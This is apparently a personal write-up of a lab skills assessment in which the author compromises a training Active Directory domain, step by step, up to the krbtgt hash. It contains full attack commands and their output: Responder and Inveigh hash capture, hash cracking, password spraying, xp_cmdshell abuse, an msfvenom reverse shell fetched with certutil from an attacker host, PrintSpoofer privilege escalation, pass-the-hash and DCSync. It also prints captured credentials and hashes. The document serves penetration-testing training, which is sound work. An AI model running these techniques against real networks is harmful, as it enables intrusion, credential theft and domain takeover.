AD Enumeration & Attacks - Skills Assessment Part II
We already have SSH access to the internal network via a Parrot Linux VM without any credentials. Our objective is to compromise the Active Directory by gaining access to it and obtaining the krbTGT hash.
Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?
First i ran an Nmap scan and used responder to capture any NTLM hash
nmap -T4 -A 172.16.6.0/23 -oN nmap_scan.txt &
responder -I ens24&At the moment of enumeration. i determined the IP address of the domain controller by using 'nslookup'. Then i attempted to check for any null sessions in SMB or rpcclient, but no success. Subsequently i resorted to using ldapsearch to gather information from LDAP initiating the command as follows:
ldapsearch -x -h 172.16.7.3 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=INLANEFREIGHT,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
and i try to gather more informations like users,computers.. by using this command:
ldapsearch -h 172.16.7.3 -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * +
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=INLANEFREIGHT,DC=LOCAL
ldapServiceName: INLANEFREIGHT.LOCAL:[email protected]
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC
=LOCAL
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
ation,DC=INLANEFREIGHT,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=INLANEFREIGHT,DC=LOCAL
namingContexts: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=INLANEFREIGHT,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 94362
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
CN=Sites,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
dnsHostName: DC01.INLANEFREIGHT.LOCAL
defaultNamingContext: DC=INLANEFREIGHT,DC=LOCAL
currentTime: 20240318110728.0Z
configurationNamingContext: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
I specified 'objectClass: person' here to see if I could obtain any valid users.
ldapsearch -h 172.16.7.3 -x -b "DC=INLANEFREIGHT,DC=LOCAL" '(objectClass=Person)'And finally i obtained the Nmap results:
Nmap scan report for inlanefreight.local (172.16.7.3)
Host is up (0.040s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-18 21:44:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:c9:44 (VMware)
| smb2-time:
| date: 2024-03-18T21:44:06
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: -1s
Nmap scan report for 172.16.7.50
Host is up (0.040s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-18T21:44:16+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=MS01.INLANEFREIGHT.LOCAL
| Not valid before: 2024-03-17T21:40:47
|_Not valid after: 2024-09-16T21:40:47
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:7c:72 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-03-18T21:44:08
|_ start_date: N/A
Nmap scan report for 172.16.7.60
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-18T17:45:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-18T17:20:37
|_Not valid after: 2054-03-18T17:20:37
| ms-sql-ntlm-info:
| Target_Name: INLANEFREIGHT
| NetBIOS_Domain_Name: INLANEFREIGHT
| NetBIOS_Computer_Name: SQL01
| DNS_Domain_Name: INLANEFREIGHT.LOCAL
| DNS_Computer_Name: SQL01.INLANEFREIGHT.LOCAL
| DNS_Tree_Name: INLANEFREIGHT.LOCAL
|_ Product_Version: 10.0.17763
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SQL01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:ce:a5 (VMware)
| ms-sql-info:
| Windows server name: SQL01
| 172.16.7.60\SQLEXPRESS:
| Instance name: SQLEXPRESS
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
| TCP port: 1433
|_ Clustered: false
| smb2-time:
| date: 2024-03-18T17:45:47
|_ start_date: N/A
So we have:
Domain Controller (DC) with IP address: 172.16.7.3
MS01 host with IP address: 172.16.7.50
SQL01 server with IP address: 172.16.7.60
After finishing the analysis i noticed that I obtained a hash of a user. Do you remember the Responder tool we started with initially? The hashes are saved in "/usr/share/responder/logs/SMB-NTLMv2-SSP-IpTarget". Now all we need to do is crack this NTLMv2 hash using hashcat.
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt i successfully retrieved the password for the user.
What is this user's cleartext password?
The response to the first question is the cracked NTLM hash.
Submit the contents of the C:\flag.txt file on MS01
Now that we have the credentials of that user we can use CrackMapExec to determine which protocol we can use to obtain a shell.
$crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal'
#nothing happen
$crackmapexec winrm 172.16.7.50 -u 'AB920' -p 'weasal'
SMB 172.16.7.50 5985 MS01 [*] Windows 10.0 Build 17763 (name:MS01) (domain:INLANEFREIGHT.LOCAL)
HTTP 172.16.7.50 5985 MS01 [*] http://172.16.7.50:5985/wsman
WINRM 172.16.7.50 5985 MS01 [+] INLANEFREIGHT.LOCAL\AB920:weasal (Pwn3d!)
As you can see we can use WinRM on MS01. Therefore we'll use Evil-WinRM because i prefer it over Impacket-WMIExec as it offers more features such as download and upload capabilities ..etc
evil-winrm 172.16.7.50 -u '' -p ''and got the flag
Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
I've attempted several techniques here but none have worked and i'm reconsidering whether the question implies performing a password spray attack so let's check the lockout threshold on the account to understand how many attempts we have before the account gets locked out.
*Evil-WinRM* PS C:\Users\AB920\Documents> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.
So we don't have a specific number meaning we can spray passwords as often as we want. However let's focus on setting a weak password and spraying it across all user accounts. To obtain a list of users in the domain we can use the credentials of the compromised user with the following command:
crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal' --usersto build a simple world listI initially used the top 20 common passwords
123456
123456789
12345
qwerty
password
12345678
111111
123123
1234567890
1234567
qwerty123
000000
1q2w3e
aa12345678
abc123
password1
1234
qwertyuiop
123321
password123All of these passwords failed i then tried a wordlist containing the top 1-1000 common passwords, which I found on Wikipedia and it worked.
kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 users_valid.txt password.txtand this the user a got the user "BR086"
What is this user's password?
The passwords were discovered in the previous question using Kerbrute.
Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
"I used the credentials of the user "BR086" to enumerate all shared files over the network so for this task i employed my favorite tool "smbmap".
smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares READ ONLY Share for department users
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server shareSo let's enumerate each directory. To simplify this process i continue using the same tool which is why I prefer it. I'll start with the 'netlogon' directory.
smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R NETLOGON
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
NETLOGON READ ONLY
.\NETLOGON\*
dr--r--r-- 0 Fri Apr 1 10:44:02 2022 .
dr--r--r-- 0 Fri Apr 1 10:44:02 2022 ..
nothing special and i move to "Department Shares"
smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R "Department Shares"
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department Shares\*
dr--r--r-- 0 Fri Apr 1 11:04:17 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:17 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 Accounting
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 Executives
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 Finance
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 HR
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 IT
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 Marketing
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 R&D
.\Department Shares\Accounting\*
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:17 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:54 2022 Public
.\Department Shares\Executives\*
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:15 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:49 2022 Public
.\Department Shares\Finance\*
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:12 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:43 2022 Public
.\Department Shares\HR\*
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:04 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:27 2022 Public
.\Department Shares\IT\*
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:22 2022 Public
.\Department Shares\IT\Private\*
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 Development
.\Department Shares\IT\Private\Development\*
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 ..
fr--r--r-- 1203 Fri Apr 1 11:05:02 2022 web.config
.\Department Shares\Marketing\*
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:10 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:38 2022 Public
.\Department Shares\R&D\*
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:07 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:33 2022 Public
i discovered a suspicious file named 'web.config' in the 'netlogon' directory. Upon downloading it i found credentials of a user. you can download the file with any command you prefer. As always i used smbmap for this task.
smbmap -u BR086 -p Welcome1 -R Department Shares -H 172.16.7.3 -A web.config -qSubmit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
i used MSSQL to authenticate with the user obtained credentials using the following commands.
mssqlclient.py INLANEFREIGHT/[email protected]
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> xp_cmdshell
and i run "whoami /priv" and i found these juicy privileges
SQL> xp_cmdshell "whoami /priv"
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL We're aware that we can exploit the "SeImpersonatePrivilege" privilege with various exploits. In my case i exploited it using the printSpooler to obtain a shell as "nt authority\system". To do this i generated a reverse tcp shell with msfvenom using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=4444 -f exe > shell.exe I utilized Meterpreter to facilitate transferring files and also dumping hashes with the 'include' option and i downloaded the 'printSpooler.exe' and 'shell.exe' files to the target machine "SQL01" using the following command:
SQL> xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240/PrintSpoofer.exe c:\users\Public\PrintSpoofer.exe"
SQL> xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240/reverse_shell.exe c:\users\Public\shell.exe"and after running the exploit i use multi/handler in vm parote the attacker machine and than running the exploit
xp_cmdshell c:\users\Public\PrintSpoofer.exe -c "c:\users\Public\reverse_shell.exe"and we will get the shell
[*] Started reverse TCP handler on 172.16.7.240:4444
[*] Sending stage (200262 bytes) to 172.16.7.60
[*] Meterpreter session 1 opened (172.16.7.240:4444 -> 172.16.7.60:56938 ) at 2024-03-18 14:30:56 -0400
meterpreter > shell
Process 5580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
so you can read the flag
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
Here i simply dumped the hash using the 'hashdump' option in Meterpreter which provided me with the administrator hash.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070and i use it to see if we can pass it to access to MS01 host using crackmapexec
crackmapexec winrm 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99
WINRM 172.16.7.50 5985 NONE [*] None (name:172.16.7.50) (domain:None)
WINRM 172.16.7.50 5985 NONE [*] http://172.16.7.50:5985/wsman
WINRM 172.16.7.50 5985 NONE [+] None\Administrator:bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!)
Boom! It worked. We can use the hash to gain access to the host so let's use Evil-WinRM as always.
evil-winrm -i 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99and you can read the flag
Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
i run SharpHound
.\SharpHound.exe -c ALL --zipfilename enumThen i downloaded it to my Kali machine and extracted it, to use GUI version of BloodHound. iselected 'Find Shortest Paths to Domain Admins'.
so the answer is "GT059" user
Crack this user's password hash and submit the cleartext password as your answer.
Here i attempted to use Mimikatz to extract any credentials from memory but it did not work. Then i recalled the functionality of 'Inveigh.exe' which is similar to Responder in Linux so downloaded it to MS01.
Evil-WinRM* PS C:\Users\Administrator\Desktop> upload Inveigh.exe
Info: Uploading Inveigh.exe to C:\Users\Administrator\Desktop\Inveigh.exelet's capture some ntlm ticket
.\Inveigh.exeboom we capture the NTLMv2 of the user "CT059" so we need just to crack it now
*Evil-WinRM* PS C:\Users\Administrator\Desktop> .\Inveigh.exe
[*] Inveigh 2.0.4 [Started 2024-03-18T15:27:50 | PID 2856]
[+] Packet Sniffer Addresses [IP 172.16.7.50 | IPv6 fe80::190a:5243:cf28:df7a%5]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.7.50 | IPv6 fe80::190a:5243:cf28:df7a%5]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\Administrator\Desktop]
[+] Previous Session Files (Not Found)
[*] Press ESC to enter/exit interactive console
[.] [15:28:51] TCP(5985) SYN packet from 172.16.7.240:37138
[.] [15:28:51] TCP(5985) SYN packet from 172.16.7.240:37140
[.] [15:29:27] TCP(445) SYN packet from 172.16.7.3:62200
[.] [15:29:27] SMB1(445) negotiation request detected from 172.16.7.3:62200
[.] [15:29:27] SMB2+(445) negotiation request detected from 172.16.7.3:62200
[+] [15:29:27] SMB(445) NTLM challenge [F727C1E3FFDFA0B9] sent to 172.16.7.50:62200
[+] [15:29:27] SMB(445) NTLMv2 captured for [INLANEFREIGHT\CT059] from 172.16.7.3(DC01):62200:
CT059::INLANEFREIGHT:F727C1E3FFDFA0B9:22DB0E58D4BF6ACE486836CFB47D51D0:010100000000000094EE3FF97279DA0102BEE3F4CABE37750000000002001A0049004E004C0041004E0045004600520045004900470048005400010008004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00030030004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000700080094EE3FF97279DA01060004000200000008003000300000000000000000000000002000002C16FB4DD923C41EF793B8F89EE541E3A6576D4FCD6FDD38AFE3F5F519AA000A0A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0037002E0035003000000000000000000000000000
i use hashcat to crack the NTLMv2 hash
hashcat -m 5600 hash -w ./rockyou.txtI've got the password
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
So we need to add any compromised user whose credentials we have to the Domain Admins group with the 'GenericAll' ability in my case i will add user 'AB920' and still have a session on the SQL01.inlanefreight host. You can execute these commands on the MS01 host it will work the same way.
PS C:\Windows\system32> $SecPassword = ConvertTo-SecureString 'charlie1' -AsPlainText -Force
PS C:\Windows\system32> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\CT059', $SecPassword)so i upload PowerView into this host using download option in meterpreter
Import-Module PowerView.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'AB920' -Credential $Credif we check the if the user was added to Domain Admins group
PS C:\Users\public> Get-DomainGroupMember -Identity 'Domain Admins'
Get-DomainGroupMember -Identity 'Domain Admins'
GroupDomain : INLANEFREIGHT.LOCAL
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : AB920
MemberDistinguishedName : CN=AB920,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3327542485-274640656-2609762496-4610
GroupDomain : INLANEFREIGHT.LOCAL
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3327542485-274640656-2609762496-500and it's work we can now perform DCsync and retrieve ktbTGT hash
Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.
in my case i use just simply secretsdump
secretsdump.py -just-dc AB920:[email protected] -outputfile dcsync_hashes
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:234a798328eb83fda24119597ffba70b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7eba70412d81c1cd030d72a3e8dbe05f:::I didn't specify the user from which I want to get the hash. You can add " -just-dc-user inlanefreight/krbtgt" to specify.
Last updated
Was this helpful?